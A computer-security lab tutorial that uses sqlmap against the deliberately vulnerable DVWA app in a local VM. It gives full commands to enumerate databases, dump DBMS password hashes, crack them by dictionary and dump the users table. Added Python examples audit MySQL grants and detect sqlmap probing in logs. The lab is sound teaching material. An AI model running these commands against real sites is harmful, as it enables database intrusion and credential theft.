ComputerSecurityStudent (CSS)

DVWA v1.0.7

(Damn Vulnerable Web App (DVWA): Lesson 7)

{ Automate SQL Injection with SqlMap }


Section 0. Background Information
  • What is Damn Vulnerable Web App (DVWA)?
    • Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.
    • Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.

  • What is a SQL Injection?
    • SQL injection (also known as SQL fishing) is a technique often used to attack data driven applications.
    • This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker). SQL injection is a code injection technique that exploits a security vulnerability in an application's software.
    • The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.

  • What is sqlmap?
    • sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

  • Pre-Requisite Labs
  • References
  • Lab Notes
    • In this lab we will do the following:
      1. We will use sqlmap to obtain the following pieces of information:
        1. A list of Database Management Usernames and Passwords.
        2. A list of databases
        3. A list of tables for a specified database
        4. A list of users and passwords for a specified database table.
  • Legal Disclaimer
    • As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC § 2-316, this product is provided with "no warranties, either expressed or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • You are on notice that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
    • © 2012 No content replication of any kind is allowed without express written permission.

     

Section 1: Configure Fedora14 Virtual Machine Settings
  1. Open Your VMware Player
    • Instructions:
      1. On Your Host Computer, Go To
      2. Start --> All Programs --> VMWare --> VMWare Player

     

  2. Edit fedora14 Virtual Machine Settings
    • Instructions:
      1. Highlight fedora14
      2. Click Edit virtual machine settings

     

  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Click on the OK Button.

 

Section 2: Login to Fedora14
  1. Start Fedora14 VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select Fedora14
      3. Play virtual machine

     

  2. Login to Fedora14
    • Instructions:
      1. Login: student
      2. Password: <whatever you set it to>.

     

 

Section 3: Open Console Terminal and Retrieve IP Address
  1. Start a Terminal Console
    • Instructions:
      1. Applications --> Terminal

     

  2. Switch user to root
    • Instructions:
      1. su - root
      2. <Whatever you set the root password to>

     

  3. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes(FYI):
      • As indicated below, my IP address is 192.168.1.106.
      • Please record your IP address.

     

Section 4: Configure BackTrack Virtual Machine Settings
  1. Open Your VMware Player
    • Instructions:
      1. On Your Host Computer, Go To
      2. Start --> All Programs --> VMWare --> VMWare Player

     

  2. Edit BackTrack Virtual Machine Settings
    • Instructions:
      1. Highlight BackTrack5R1
      2. Click Edit virtual machine settings

     

  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Do not Click on the OK Button.

 

Section 5: Login to BackTrack
  1. Start BackTrack VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select BackTrack5R1
      3. Play virtual machine

     

  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.

     

  3. Bring up the GNOME
    • Instructions:
      1. Type startx

 

Section 6: Open Console Terminal and Retrieve IP Address
  1. Open a console terminal
    • Instructions:
      1. Click on the console terminal

     

  2. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes(FYI):
      • As indicated below, my IP address is 192.168.1.105.
      • Please record your IP address.

 

Section 7: Login to DVWA
  1. Start Firefox
    • Instructions:
      1. Click on Firefox

     

  2. Login to DVWA
    • Note(FYI):
      • Replace 192.168.1.106 with Fedora's IP address obtained in (Section 3, Step 3).
    • Instructions:
      1. Start up Firefox on BackTrack
      2. Place http://192.168.1.106/dvwa/login.php in the address bar.
      3. Login: admin
      4. Password: password
      5. Click on Login

 

Section 8: Set Security Level
  1. Set DVWA Security Level
    • Instructions:
      1. Click on DVWA Security, in the left hand menu.
      2. Select "low"
      3. Click Submit

     

Section 9: Obtain PHP Cookie
  1. SQL Injection Menu
    • Instructions:
      1. Select "SQL Injection" from the left navigation menu.

     

  2. Select Tamper Data
    • Instructions:
      1. Tools --> Tamper Data

     

  3. Start Tamper Data
    • Instructions:
      1. Click on Start Tamper

     

  4. Basic Injection
    • Instructions:
      1. Input "1" into the text box.
      2. Click Submit.
    • Notes(FYI):
      • The goal here is to see the GET request that the browser sends to the CGI program behind the scenes.
      • Also, we will use the "Surname" output with SQLMAP to obtain database username and password contents.

     

  5. Tamper with request?
    • Instructions:
      1. Make sure the "Continue Tampering?" checkbox is unchecked.
      2. Then Click Submit

     

  6. Copying the Referer URL
    • Instructions:
      1. Select the second GET Request
      2. Right Click on the Referer Link
      3. Select Copy

     

  7. Open Notepad
    • Instructions:
      1. Applications --> Wine --> Programs --> Accessories --> Notepad

     

  8. Paste Referer URL into Notepad
    • Instructions:
      1. Edit --> Paste

     

  9. Copying the Cookie Information
    • Instructions:
      1. Right Click on the Cookie line
      2. Select Copy

     

  10. Pasting the Cookie Information
    • Instructions:
      1. Edit --> Paste
    • Notes(FYI):
      • Now you should have copied both the Referer and Cookie lines into Notepad. (See Picture)

 

Section 10: Using SqlMap to Obtain Current User and Database
  1. Verify sqlmap.py exists
    • Instructions:
      1. cd /pentest/database/sqlmap
      2. ls -l sqlmap.py

     

  2. Obtain Database User For DVWA
    • Notes(FYI):
      1. Obtain the referer link from (Section 9, Step 10), which is placed after the "-u" flag below.
      2. Obtain the cookie line from (Section 9, Step 10), which is placed after the "--cookie" flag below.
      3. Replace 192.168.1.106 with Fedora's IP address obtained in (Section 3, Step 3).
      4. Replace (lpb5g4uss9kp70p8jccjeks621) with your PHPSESSID obtained from (Section 9, Step 10).
    • Instructions:
      1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -b --current-db --current-user
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • -b, Retrieve DBMS banner
        • --current-db, Retrieve DBMS current database
        • --current-user, Retrieve DBMS current user

     

  3. Do you want to keep testing?
    • Instructions:
      1. keep testing? y
      2. skip payloads? y

     

  4. Viewing Results
    • Instructions:
      1. For the web application DVWA, the current database is "dvwa" and the DBMS user the application connects with is "root@localhost".

 

Section 11: Using SqlMap to Obtain Database Management Username and Password
  1. Obtain Database Management Username and Password
    • Notes(FYI):
      • You must have completed Lesson 4 to see the db_hacker user in Step 2.
      • Replace 192.168.1.106 with Fedora's IP address obtained in (Section 3, Step 3).
      • Replace (lpb5g4uss9kp70p8jccjeks621) with your PHPSESSID obtained from (Section 9, Step 10).
    • Instructions:
      1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" --string="Surname" --users --password
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • --string, A string that is present in the response to a valid (true) query, here "Surname", so sqlmap can tell true from false results.
        • --users, List database management system users
        • --password, List password hashes of the database management system users (accepted as an abbreviation of sqlmap's --passwords switch).

     

  2. Obtain Database Management Username and Password (Part 2)
    • Instructions:
      1. Use Dictionary Attack? Y
      2. Dictionary Location? <Press Enter>
    • Notes(FYI):
      1. Notice the password for username db_hacker was cracked.

     

  3. Obtain db_hacker Database Privileges
    • Note(FYI):
      • Replace 192.168.1.106 with Fedora's IP address obtained in (Section 3, Step 3).
      • Replace (lpb5g4uss9kp70p8jccjeks621) with your PHPSESSID obtained from (Section 9, Step 10).
    • Instructions:
      1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -U db_hacker --privileges
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • -U, Specify database management user
        • --privileges, list database management system user's privileges

     

  4. View Results: Obtain db_hacker Database Privileges
    • Instructions:
      1. Notice that DBMS user "db_hacker" has administrative privileges
      2. Notice that "db_hacker" can log in from anywhere, via the "%" wildcard operator.
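
As an added example (not part of this lesson), a Python audit that parses SHOW GRANTS output and flags the two findings above: accounts reachable from any host via "%" and accounts holding administrative or global privileges. The grant statements are constructed to mirror the lab's root@localhost and db_hacker accounts; dvwa_app is a hypothetical least-privilege account included for comparison.

```python
import re

# Constructed SHOW GRANTS output mirroring the lab's findings (the application connects as
# root@localhost; db_hacker is an administrator reachable from any host); dvwa_app is a
# hypothetical least-privilege account for comparison. Not captured from a real server.
SHOW_GRANTS_OUTPUT = [
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION",
    "GRANT ALL PRIVILEGES ON *.* TO 'db_hacker'@'%' WITH GRANT OPTION",
    "GRANT USAGE ON *.* TO 'dvwa_app'@'localhost'",
    "GRANT SELECT ON `dvwa`.* TO 'dvwa_app'@'localhost'",
]

GRANT_RE = re.compile(
    r"^GRANT (?P<privs>.+?) ON (?P<scope>\S+) TO '(?P<user>[^']*)'@'(?P<host>[^']*)'(?P<rest>.*)$"
)
# Privileges that amount to control of the server rather than ordinary data access.
ADMIN_PRIVS = {"ALL PRIVILEGES", "SUPER", "FILE", "PROCESS", "SHUTDOWN", "CREATE USER"}

def parse_grant(stmt):
    """Break one GRANT statement into account, host, privilege set, scope and grant option."""
    m = GRANT_RE.match(stmt.strip())
    if not m:
        raise ValueError("unrecognised GRANT statement: %r" % stmt)
    return {
        "account": "%s@%s" % (m.group("user"), m.group("host")),
        "host": m.group("host"),
        "privs": {p.strip().upper() for p in m.group("privs").split(",")},
        "scope": m.group("scope"),
        "grant_option": "WITH GRANT OPTION" in m.group("rest"),
    }

def audit(statements):
    """Map each account to its least-privilege findings (an empty list means none)."""
    findings = {}
    for stmt in statements:
        g = parse_grant(stmt)
        issues = findings.setdefault(g["account"], [])
        if "%" in g["host"]:
            issues.append("host pattern %r permits login from any matching host" % g["host"])
        admin = sorted(g["privs"] & ADMIN_PRIVS)
        if admin:
            issues.append("administrative privileges %s on %s" % (", ".join(admin), g["scope"]))
        if g["scope"] == "*.*" and g["privs"] != {"USAGE"}:
            issues.append("privileges granted globally (*.*) instead of on one database")
        if g["grant_option"]:
            issues.append("WITH GRANT OPTION lets the account hand out its own rights")
    return findings
```

Run audit(SHOW_GRANTS_OUTPUT) to see db_hacker@% collect four findings and root@localhost three, while the scoped dvwa_app account collects none.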

 

Section 12: Obtain a list of all Databases
  1. Obtain a list of all databases
    • Notes(FYI):
      1. Obtain the referer link from (Section 9, Step 10), which is placed after the "-u" flag below.
      2. Obtain the cookie line from (Section 9, Step 10), which is placed after the "--cookie" flag below.
      3. Replace 192.168.1.106 with Fedora's IP address obtained in (Section 3, Step 3).
      4. Replace (lpb5g4uss9kp70p8jccjeks621) with your PHPSESSID obtained from (Section 9, Step 10).
    • Instructions:
      1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" --dbs
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • --dbs, List database management system's databases.

     

  2. Review Results: Obtain a list of all databases
    • Notes(FYI):
      1. Notice that sqlmap supplies a list of available databases.

 

Section 13: Obtain "dvwa" tables and contents
  1. Obtain "dvwa" tables and contents
    • Notes(FYI):
      1. Obtain the referer link from (Section 9, Step 10), which is placed after the "-u" flag below.
      2. Obtain the cookie line from (Section 9, Step 10), which is placed after the "--cookie" flag below.
      3. Replace 192.168.1.106 with Fedora's IP address obtained in (Section 3, Step 3).
      4. Replace (lpb5g4uss9kp70p8jccjeks621) with your PHPSESSID obtained from (Section 9, Step 10).
    • Instructions:
      1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -D dvwa --tables
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • -D, Specify Database
        • --tables, List Database Tables

     

  2. Viewing "dvwa" tables and content results
    • Notes(FYI):
      1. Notice sqlmap listed two tables: guestbook and users.

     

  3. Obtain columns for table dvwa.users
    • Notes(FYI):
      1. Obtain the referer link from (Section 9, Step 10), which is placed after the "-u" flag below.
      2. Obtain the cookie line from (Section 9, Step 10), which is placed after the "--cookie" flag below.
      3. Replace 192.168.1.106 with Fedora's IP address obtained in (Section 3, Step 3).
      4. Replace (lpb5g4uss9kp70p8jccjeks621) with your PHPSESSID obtained from (Section 9, Step 10).
    • Instructions:
      1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -D dvwa -T users --columns
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • -D, Specify Database
        • -T, Specify the Database Table
        • --columns, List the Columns of the Database Table.

     

  4. Viewing Results: columns for table dvwa.users
    • Notes(FYI):
      1. Notice that the dvwa.users table has both a user column and a password column.

     

  5. Obtain Users and their Passwords from table dvwa.users (Part 1)
    • Notes(FYI):
      1. Obtain the referer link from (Section 9, Step 10), which is placed after the "-u" flag below.
      2. Obtain the cookie line from (Section 9, Step 10), which is placed after the "--cookie" flag below.
      3. Replace 192.168.1.106 with Fedora's IP address obtained in (Section 3, Step 3).
      4. Replace (lpb5g4uss9kp70p8jccjeks621) with your PHPSESSID obtained from (Section 9, Step 10).
    • Instructions:
      1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -D dvwa -T users -C user,password --dump
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • -D, Specify Database
        • -C, Specify the table columns to dump (here user and password)
        • --dump, Dump table contents

     

  6. Obtain Users and their Passwords from table dvwa.users (Part 2)
    • Instructions:
      1. Do you want to use the LIKE operator? Y
      2. Recognize possible HASH values? Y
      3. What's the dictionary location? <Press Enter>
      4. Use common password suffixes? y

     

  7. Review Results: Users and their Passwords from table dvwa.users
    • Notes(FYI):
      1. Notice how sqlmap nicely displays passwords for each user.
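
A defender-side counterpart to the sqlmap runs in Sections 10 through 13, added here and not part of the original lesson: a Python script that parses Apache combined-format access log lines for the DVWA sqli page and flags requests whose user-agent names a scanner or whose id parameter carries quotes, comment markers or SQL keywords (the true/false probe pairs that --string="Surname" relies on show up this way). The log lines and the sqlmap user-agent string are constructed samples; the path and the id parameter are the ones used in this lab.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format lines (not real traffic): one browser request, two
# scanner requests carrying a percent-encoded boolean probe in id, one benign request.
SAMPLE_LOG = """\
192.168.1.105 - - [10/Mar/2012:10:01:02 -0500] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4371 "http://192.168.1.106/dvwa/vulnerabilities/sqli/" "Mozilla/5.0 (X11; Linux i686; rv:10.0) Firefox/10.0"
192.168.1.105 - - [10/Mar/2012:10:02:15 -0500] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20AND%201%3D1--%20&Submit=Submit HTTP/1.1" 200 4371 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
192.168.1.105 - - [10/Mar/2012:10:02:15 -0500] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20AND%201%3D2--%20&Submit=Submit HTTP/1.1" 200 4310 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
192.168.1.50 - - [10/Mar/2012:10:03:00 -0500] "GET /dvwa/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1" 200 4371 "http://192.168.1.106/dvwa/vulnerabilities/sqli/" "Mozilla/5.0 (Windows NT 6.1; rv:10.0) Firefox/10.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Quote, comment and keyword patterns that should never occur in a numeric id value.
SQLI_RE = re.compile(r"'|--|/\*|\b(OR|AND|UNION|SELECT|SLEEP|BENCHMARK)\b", re.I)
TOOL_UA_RE = re.compile(r"sqlmap", re.I)

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(entry, watched_path="/dvwa/vulnerabilities/sqli/"):
    """Return the reasons a request looks like injection probing; empty if benign."""
    reasons = []
    url = urlsplit(entry["target"])
    if url.path != watched_path:
        return reasons
    if TOOL_UA_RE.search(entry["ua"]):
        reasons.append("scanner user-agent: %s" % entry["ua"])
    for value in parse_qs(url.query).get("id", []):  # parse_qs percent-decodes the value
        if SQLI_RE.search(value):
            reasons.append("sql metacharacters in id=%r" % value)
    return reasons

def scan(log_text, watched_path="/dvwa/vulnerabilities/sqli/"):
    """Return (suspicious_requests, requests_per_source_ip) for the supplied log text."""
    hits, per_ip = [], Counter()
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry, watched_path)
        if reasons:
            hits.append((entry["ip"], entry["target"], reasons))
            per_ip[entry["ip"]] += 1
    return hits, per_ip
```

Calling scan(SAMPLE_LOG) reports only the two scanner requests, both from 192.168.1.105, each with two reasons; a burst of such requests from one source against one parameter is the pattern to alert on.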

 

Section 14: Proof of Lab Using John the Ripper
  1. Proof of Lab
    • Instructions:
      1. Bring up a new terminal, see (Section 7, Step 1)
      2. cd /pentest/database/sqlmap
      3. find output/* -print | xargs ls -l
      4. date
      5. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • e.g., echo "John Gray"
    • Proof of Lab Instructions:
      1. Do a <PrtScn>
      2. Paste into a word document
      3. Upload to Moodle

 

